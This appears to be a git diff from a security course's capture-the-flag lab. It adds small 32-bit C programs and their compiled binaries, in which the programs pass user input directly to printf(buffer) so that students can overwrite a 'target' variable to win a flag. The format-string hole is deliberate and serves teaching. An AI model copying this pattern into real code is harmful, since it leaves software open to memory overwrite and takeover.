+    read(0, buffer, BUFFER_LEN-1);
+
+    printf(buffer);
+
+    if (target != 0) {
+        printf("Success! You hit the target!\n");
+        printf("Here is your flag: %s\n", get_flag());
+    } else {
+        printf("Oops, not quite!\n");
+    }
+}
+
+int main() {
+    vuln();
+}
diff --git a/pa/lab7/04_match_value b/pa/lab7/04_match_value
new file mode 100755
index 0000000000000000000000000000000000000000..439f2af534361db526034ada11f2dea887484a68
GIT binary patch
literal 18848
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%0A@P0UQsQ`CoQ6d#Z(BBQR*1e3
z4wwVDhnac99yG8MIfMAkFydKbAf4@xrj0mmoR$%F4vJWIFqbxMGagyBvh~_uZ)7A=
znUoRD=c7Z2M(q5MNaUk~xS=_NgF`4%h7fL~>?x*GFZJl0Vf1Y8xUt*lzNyPFfTond
zeY9)$O&vFG*)&xn_fA8Ec*5xJE!EK5wOtsSw{Gj~*lKL+>Dke})7aV3xwV_M${p7+
z%aMJT8?)Qn)h26htwu;3;oUzM!{-c6W?!WLU};bHe`l9-gQUsOLGJgSQp$91_0u+a
zPnxu$12l2>cFPUrlgbvMZtGL`f1`+%HImUxJnil)FE27}i#l$$xE)V1n7#-7*C^>O
z9t~l{(}*$<0YnkA!u574X5>-`TM{`Vc>ta7w{RmzH|<j3bg4U|2Vo{dwTVscj7Xzt
zh<Dz&sdV(^Ci(K7zyMa|5)rY61`*$Y+j*BKRSr?9na_y`z9catSl2}QofQ5oLMmP+
zLZFy4^Y&0l)X}*Gq2z#&=1GK#A`&0Upb3{FAd(t<+hQSjoB|B!;1$}tnOxcy5$Ui9
zvJr%BB4V2dA>;`Io2;A%5i?mjMUrt;p^#hDJy+ZkDvt)DgDF%tkVReiVfE-A<HrbG
zFCsW=2XQ7sX7)P+C>LeyrC=(P$f|s_zdvv8R|tPF!c=)UQC&}d6V5w4FS)$z$iM3W
z;6@#8Y3i7+0x_DRo&5V5P&6X160h$}D?!Rm{v8e2@j0qW%5Dn;%8v0JAC~IM2wd6S
zg8Z-W9F*-c?ps>2b0a<1j<!({mi)4Rj0byRcLtbkpbN4-KBG;67*(=9KFgg4a142s
zXv=gLh|ghZ$N2Fn*zvirYL{}-eIP!!Wu9^6DcH3jU*0aD7y&Wbq#fhU^RQ!3pz7lo
zh#v#dt`o#(#TQ}Mhdk|gPf>Q?K%RY-<r#lsaE-t!(T?e>AZ5q6wFP!3q{jULlyyE?
zX2*E;Ehvt=Ci0hdr0;-KeY|fTLI~T7KB`0;re{FPj`723JOp>6PpO_bzCSG4(JwMC
z)`j5HJ(biro`-<-(N6yT72W;YD}XX7yE8z_j&bzmi-h<c3Q9@Y{VOnIO?I8}8vibf
z($SQ8(z_r=@w8*ySNAD)zkr^{f_97t`FCgv$a5Yru`V9p3m|rfcKmxC7eA#w8Yw#&
zFSa1gLK&4*|AJ+9jKkVs$97br9aAmrC}+EjN7jFeT|=opsAZzvHKjZm`$S@#O0LoX
z>~sadm2UYoyN6)+4m(jw%8q}>N9C#7hr!-lCQ#X)X?A~g9nNW`L^+k+Ub0i;Sb~K^
zY+AdtCCRx5&h+qFA=(ifE=Il;ME})+cutlT7pL*)mk)bYQtje&m|}OlQ;6G@5;~Rr
EFZTi>Y5)KL

literal 0
HcmV?d00001

diff --git a/pa/lab7/04_match_value.c b/pa/lab7/04_match_value.c
new file mode 100644
index 0000000..0df6840
--- /dev/null
+++ b/pa/lab7/04_match_value.c
@@ -0,0 +1,27 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include <stdio.h>
+#include <unistd.h>
+#include "get_flag.h"
+
+#define BUFFER_LEN 128
+
+unsigned int target = 0;
+
+void vuln() {
+    char buffer[BUFFER_LEN] = {0};
+    read(0, buffer, BUFFER_LEN-1);
+
+    printf(buffer);
+
+    if (target == 327) {
+        printf("Success! You hit the target!\n");
+        printf("Here is your flag: %s\n", get_flag());
+    } else {
+        printf("Oops, not quite! The target was: 327\nCurrent value is %d.\n", target);
+    }
+}
+
+int main() {
+    vuln();
+}
diff --git a/pa/lab7/05_write_specific_byte b/pa/lab7/05_write_specific_byte
new file mode 100644
index 0000000000000000000000000000000000000000..0e34d3e8eb7ca61c4bec66d993e988d81bbe522a
GIT binary patch
literal 19000
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
Nahni~=~YtM{|4&$MGpV~

literal 0
HcmV?d00001

diff --git a/pa/lab7/05_write_specific_byte.c b/pa/lab7/05_write_specific_byte.c
new file mode 100644
index 0000000..35ffdab
--- /dev/null
+++ b/pa/lab7/05_write_specific_byte.c
@@ -0,0 +1,29 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include <stdio.h>
+#include <unistd.h>
+#include "get_flag.h"
+
+#define BUFFER_LEN 128
+
+unsigned int target_before = 0;
+unsigned int target = 0;
+unsigned int target_after = 0;
+
+void vuln() {
+    char buffer[BUFFER_LEN] = {0};
+    read(0, buffer, BUFFER_LEN-1);
+
+    printf(buffer);
+
+    if (((target >> 24) & 0xff) == 2) {
+        printf("Success! You hit the target!\n");
+        printf("Here is your flag: %s\n", get_flag());
+    } else {
+        printf("Oops, not quite! The target was: 2\nCurrent value is %x.\n", target >> 24);
+    }
+}
+
+int main() {
+    vuln();
+}
diff --git a/pa/lab7/06_write_big_number b/pa/lab7/06_write_big_number
new file mode 100755
index 0000000000000000000000000000000000000000..3c61df342a99c05b07e146af55c97957a886351c
GIT binary patch
literal 18988
zcmeHPeQ;dWb-(*%y_MvZEDL{Nz|TgeCYDyR5dL;7*^(@Qu!TPY#=!Gx_pNsA)$X$U
zo-I*6Y!nKPtHw?#B`FyknoQfYBn(44gdwRx225s{It*=TI%(ZNnDwB7iJc5nJK6qz
z_q{8v1x(wS{?VE4wa=dWJLlYwckX@fo%`Oqda$dn+vD*FmAt|yhz=g}Yi;1a-|1-D
zgf6PZQqdr;6*C~BuI(UfKnGEP<cEyp13eG?{2{+anhi{%4q{1QDCE~jeNd377qzY)
